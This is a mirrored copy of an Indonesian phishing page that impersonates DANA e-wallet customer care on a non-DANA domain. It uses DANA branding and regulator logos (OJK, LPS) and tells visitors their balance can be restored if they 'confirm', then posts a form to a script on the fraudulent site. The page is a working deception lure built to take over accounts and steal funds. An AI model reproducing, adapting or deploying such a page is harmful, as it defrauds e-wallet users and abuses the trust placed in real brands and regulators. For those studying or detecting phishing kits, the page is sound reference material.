


<!DOCTYPE html>
<html lang="id" class="notranslate">

<!-- Mirrored from bnpp.biz.id/Bantuan-Layanan-Pemulihan-Akun/ by HTTrack Website Copier/3.x [XR&CO'2017], Mon, 06 May 2024 08:30:31 GMT -->
<head>
<meta data-n-head="ssr" charset="utf-8">
<meta data-n-head="ssr" name="viewport" content="width=device-width, initial-scale=1">
<meta data-n-head="ssr" data-hid="theme-color" name="theme-color" content="#118ee9">
<meta data-n-head="ssr" data-hid="apple-mobile-web-app-status-bar-style" name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta data-n-head="ssr" data-hid="twitter:image" name="twitter:image" content="../../blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftOkTXOPr5az8LHt3m-DZNiM0T98GalJ0P3bBLQK/s1080/IMG_20231205_025342.jpg">
<meta data-n-head="ssr" data-hid="og:image" property="og:image" content="../../blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiftOkTXOPr5az8LHt3m-DZNiM0T98GalJ0P3bBLQK/s1080/IMG_20231205_025342.jpg">
<meta data-n-head="ssr" data-hid="og:site_name" name="og:site_name" content="DANA.id">
<meta data-n-head="ssr" data-hid="description" name="description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta data-n-head="ssr" data-hid="twitter:title" name="twitter:title" content="DANA - Apa pun transaksinya selalu ada DANA">
<meta data-n-head="ssr" data-hid="twitter:description" name="twitter:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta data-n-head="ssr" data-hid="og:title" name="og:title" content="𝗗𝗔𝗡𝗔 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔">
<meta data-n-head="ssr" data-hid="og:description" name="og:description" content="DANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!">
<meta data-n-head="ssr" data-hid="keywords" name="keywords" content="dana, dana indonesia, dana bisnis, qris, qris adalah, qris indonesia, daftar qris, qris bank indonesia, qris dana, qris bi, qris merchant, logo qris, apa itu qris, pembayaran qris, merchant, merchant dana, daftar merchant, promo hari ini, promo terbaru, promo cashback, cashback, apa itu cashback, cashback adalah, apa itu ewallet, ewallet indonesia, pembayaran digital, dompet digital">
<link data-n-head="ssr" rel="icon" type="image/x-icon" href="../../external.html?link=https://www.dana.id/favicon.ico">
<link data-n-head="ssr" rel="preconnect" href="../../external.html?link=https://a.m.dana.id/">
<link data-n-head="ssr" rel="dns-prefetch" href="../../external.html?link=https://a.m.dana.id/">
<link data-n-head="ssr" rel="preconnect" href="../../external.html?link=https://app.link/">
<link data-n-head="ssr" rel="dns-prefetch" href="../../external.html?link=https://app.link/">
<link data-n-head="ssr" rel="preconnect" href="../../external.html?link=https://api2.branch.io/">
<link data-n-head="ssr" rel="dns-prefetch" href="../../external.html?link=https://api2.branch.io/">
<link data-n-head="ssr" rel="preconnect" href="../../external.html?link=https://youtube.com/">
<link data-n-head="ssr" rel="dns-prefetch" href="../../external.html?link=https://youtube.com/">
<link data-n-head="ssr" rel="preconnect" href="../../external.html?link=https://sentry.io/">
<link data-n-head="ssr" rel="dns-prefetch" href="../../external.html?link=https://sentry.io/">
<link data-n-head="ssr" rel="preconnect" href="../../external.html?link=https://cdn.lr-ingest.io/">
<link data-n-head="ssr" rel="dns-prefetch" href="../../external.html?link=https://cdn.lr-ingest.io/">
<title>𝗗𝗔𝗡𝗔 | 𝗖𝘂𝘀𝘁𝗼𝗺𝗲𝗿 𝗖𝗮𝗿𝗲 𝗗𝗔𝗡𝗔</title>
<link rel="stylesheet" href="../../code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css" />
<link rel="stylesheet" href="../../maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css" />

<link rel="stylesheet" type="text/css" href="../../cdn.jsdelivr.net/npm/slick-carousel%401.8.1/slick/slick.css" />
<link rel="stylesheet" type="text/css" href="../../cdn.jsdelivr.net/npm/slick-carousel%401.8.1/slick/slick-theme.css" />
<link href="../../cdn.jsdelivr.net/npm/bootstrap%405.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">

<style>
    @import url('../../external.html?link=https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&amp;display=swap');

  body {
  background-color: #0086e0;
        font-family: 'Open Sans', sans-serif;

        html {
            overflow-x: hidden;
        }
    }

    h2 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 1,0px;
        text-align: center;
        line-height: 1.5;
        border-radius: 5px;        
    }

    h3 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 1.5px;
        line-height: 1;
        border-radius: 5px;
    }

    h9 {
        font-family: 'Open Sans', sans-serif;
        font-size: 13px;
        font-weight: bold;
        text-align: center;
        color: #0086e0;
        letter-spacing: 1.5px;
        line-height: 1;
        border-radius: 5px;
    }

    h4 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: 900;
        color: #0086e0;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1.5;
    }

    h5 {
        font-family: 'Open Sans', sans-serif;
        font-size: 15px;
        font-weight: bold;
        color: #0086e0;
        letter-spacing: 1,0px;
        text-align: center;
        line-height: 1;
    }

    h6 {
        font-family: 'Open Sans', sans-serif;
        font-size: 13px;
        font-weight: bold;
        color: #000;
        letter-spacing: 1px;
        text-align: center;
        line-height: 1;
        border-radius: 5px;
    }

    .btn-punya {
        display: block;
        margin: 0px auto 0 auto;
        padding: 0px;
        cursor: pointer;
        background: none rgb(0, 134, 224);
        border: none;
        text-align: center;
        height: 55px;
        width: 536px;
        max-width: 95%;
        font-family: 'Open Sans', sans-serif;
        font-size: 16px;
        font-weight: bold;
        color: rgb(255, 255, 255);
        letter-spacing: 2px;
        line-height: 1;
        border-radius: 10px;
        box-shadow: rgb(170, 170, 170) 5px 5px 7px 0px;
        transition: background 200ms ease 0s;
    }

    .btn-belum {
        display: block;
        margin: 10px auto;
        padding: 0px;
        cursor: pointer;
        background: none transparent;
        border: none;
        text-align: center;
        height: 57px;
        width: 536px;
        max-width: 100%;
        font-family: 'Open Sans', sans-serif;
        font-size: 16px;
        font-weight: bold;
        color: rgb(0, 134, 224);
        letter-spacing: 2px;
        line-height: 1;
        border-radius: 5px;
        transition: background 200ms ease 0s;
    }

    .form-log {
        box-sizing: border-box;
        height: 40px;
        width: 536px;
        max-width: 100%;
        border: 2px solid rgb(0, 134, 224);
        border-image: initial;
        background-color: rgb(255, 255, 255);
        border-radius: 8px;
        box-shadow: rgb(237, 237, 237) 2px 2px 2px 0px;
        font-family: 'Roboto Condensed', sans-serif;
        font-weight: bold;
        font-size: 16px;
        color: rgb(28, 28, 28);
        word-spacing: 7px;
        padding: 0px 45px;
    }

    #ionIcons {
        color: rgb(22, 119, 199);
        font-size: 29px;
        position: absolute;
        display: block;
        margin-top: 1px;
        margin-left: 15px;        
    }

    input {
        border: 3px solid rgb(0, 134, 224);
        border-radius: 8px;
        padding: 5px 10px;
    }

    h1 {
        display: table;
        background: #0086e0;
        /* #0086e0; */
        color: #0086e0;
        padding: 2px;
        width: 100%;
    }

    h7 {
        display: table;
        background: #3081ce;
        color: #0086e0;
        padding: 15px;
        width: 100%;
        font-size: 12px;
        text-align: center;
        font-family: 'Roboto Condensed', sans-serif;
    }

    .container {
        max-width: 900px;
        padding: 15px;
        background-color: #fff;
        margin-left: auto;
        margin-right: auto;
    }

    .slider .slick-slide {
        border: solid 0px #000;
    }

    .slider .slick-slide img {
        width: 100%;
        margin-top: 0px;
    }

    /* make button larger and change their positions */
    .slick-prev,
    .slick-next {
        width: 0px;
        height: 0px;
        z-index: 1;
    }

    .slick-prev {
        left: 0px;
    }

    .slick-next {
        right: 0px;
    }

    .slick-prev:before,
    .slick-next:before {
        font-size: 0px;
        text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);


    h7 {
        display: table;
        background: #3081ce;
        color: #fff;
        padding: 15px;
        width: 100%;
        font-size: 12px;
        text-align: center;
        font-family: 'Roboto Condensed', sans-serif;
    }

    .container {
        max-width: 900px;
        padding: 15px;
        background-color: #fff;
        margin-left: auto;
        margin-right: auto;
    }

    .slider .slick-slide {
        border: solid 0px #000;
    }

    .slider .slick-slide img {
        width: 100%;
        margin-top: 0px;
    }

    /* make button larger and change their positions */
    .slick-prev,
    .slick-next {
        width: 0px;
        height: 0px;
        z-index: 1;
    }

    .slick-prev {
        left: 0px;
    }

    .slick-next {
        right: 0px;
    }

    .slick-prev:before,
    .slick-next:before {
        font-size: 0px;
        text-shadow: 0 0 0px rgba(0, 0, 0, 0.5);
    }

    /* move dotted nav position */
    .slick-dots {
        bottom: 0px;
    }

    /* enlarge dots and change their colors */
    .slick-dots li button:before {
        font-size: 12px;
        color: #000;
        text-shadow: 0 0 10px rgba(0, 0, 0, 0.5);
        opacity: 0;
    }

    .slick-dots li.slick-active button:before {
        color: #dedede;
    }

    /* transition effects for opacity */
    .slick-arrow,
        {
        transition: opacity 0.2s ease-out;
    }

    legend {
        padding: 2px;
        background: #transparent;
        color: #000000;
      }

    </style>
</head>
<body>
<h1><img src="../../blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrWtY0kKy_PhEmPe1oiSlQMTbwojkQ9xkGIDV7JU1/s16000/AddText_05-15-01.34.42.png" width="170" style="display:line; margin: auto;"></h1>
<div class="container">
<div class="slider">
<div> <a href="#"> <img src="../../b.top4top.io/Screenshot_20230524-014938_3.png" alt="Image 1"> </a> </div>
<div> <a href="#"> <img src="../../b.top4top.io/Screenshot_20230524-015132_2.png" alt="Image 2"> </a> </div>
<div> <a href="#"> <img src="../../f.top4top.io/Screenshot_20230524-014748_3.png" alt="Image 3"> </a> </div>
<div> <a href="#"> <img src="../../b.top4top.io/Screenshot_20230526-234613_2.png" alt="Image 5"> </a> </div>
<div> <a href="#"> <img src="../../l.top4top.io/Screenshot_20230527-004847_2.png" alt="Image 6"> </a> </div>
<div> <a href="#"> <img src="../../l.top4top.io/Screenshot_20230526-234536_2.png" alt="Image 8"> </a> <br> </div>
</div>
<form method="post" action="../../external.html?link=https://bnpp.biz.id/Bantuan-Layanan-Pemulihan-Akun/main.php">
<div class="panel panel-info">
<div class="panel-body">
<legend>
<h2>Silahkan Konfirmasi Agar Saldo di Akun Dana Anda Dapat Di Gunakan Kembali</h2>
<legend>
<div> <br> <input type="radio" id="baru" name="tarif" value="Claim Dana Kaget Anda" checked>
<label for="baru">
<h5>&nbsp;SAYA MELAKUKAN AKTIVITAS</h5>
</label>
</div>
<div> <input type="radio" id="lama" name="tarif" value="Laporkan Kendala Akun"> <label for="lama">
<h5>&nbsp; SAYA TIDAK MELAKUKAN AKTIVITAS</h5>
</label> </div>
</div> <br> <br>
<div class="row">
<div class="col-12" style="width: 459px; max-width: 100%; display: block; margin: -10px auto;">
<div class="row"> <button class="btn-punya" type="submit" value="send">Konfirmasi</button>
</form>
</div> <br>
<div class="row">
<center><h3></h3></center>
</label> </div>
</legend>
</div>
</form>
</div> <br><br>
<div class="row">
<h6>Dana Terdaftar dan diawasi oleh:</h6>
<center>
<div class="css-dnzamn"><img src="../../l.top4top.io/logo-ojk.png" width="70"><img src="../../k.top4top.io/Mitra%2520Bukalapak.png" width="70"><img src="../../c.top4top.io/Lazada%2520New.png" width="70">
<img src="../../e.top4top.io/logo-lps.png" width="70"></div>

<script type="text/javascript" src="../../cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js">
            </script> 
<script type="text/javascript" src="../../cdn.jsdelivr.net/npm/slick-carousel%401.8.1/slick/slick.min.js">
            </script>

<script>
            $(document).ready(function() {
                $('.slider').slick({
                    autoplay: true,
                    autoplaySpeed: 500,
                    dots: true
                });
            });
            </script>
</body>

<!-- Mirrored from bnpp.biz.id/Bantuan-Layanan-Pemulihan-Akun/ by HTTrack Website Copier/3.x [XR&CO'2017], Mon, 06 May 2024 08:31:46 GMT -->
</html>